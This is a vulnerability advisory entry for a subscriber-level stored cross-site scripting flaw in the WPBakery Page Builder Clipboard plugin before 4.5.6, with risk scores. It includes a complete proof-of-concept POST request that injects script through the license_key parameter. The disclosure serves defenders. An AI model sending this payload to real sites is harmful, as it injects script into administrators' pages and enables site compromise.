Lucene search

K
wpexploitCharles Strader SweethillWPEX-ID:3BC0733A-B949-40C9-A5FB-F56814FC4AF3
HistoryApr 03, 2021 - 12:00 a.m.

WPBakery Page Builder Clipboard < 4.5.6 - Subscriber+ Stored Cross-Site Scripting (XSS)

2021-04-0300:00:00
Charles Strader Sweethill
307

0.001 Low

EPSS

Percentile

21.4%

An AJAX action registered by the plugin did not have capability checks nor sanitization, allowing low privilege users (subscriber+) to call it and set XSS payloads, which will be triggered in all backend pages. Version 4.5.6 fixed the XSS issue with sanitization of the parameters, but did not fix the Subscriber+ options update. See additional related vulnerability patched in version 4.5.8.

When logged in as a user with Subcriber role or greater, submit a request to wp-admin/admin-ajax.php with action = "vc_clipboard_activate" and Javascript can be set in the "email" or "license_key" parameters.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Connection: close
Cookie: [Subscriber+ cookies]

action=vc_clipboard_activate&email=alertfoo&license_key=</script><script>alert(123);</script><script>

0.001 Low

EPSS

Percentile

21.4%

Related for WPEX-ID:3BC0733A-B949-40C9-A5FB-F56814FC4AF3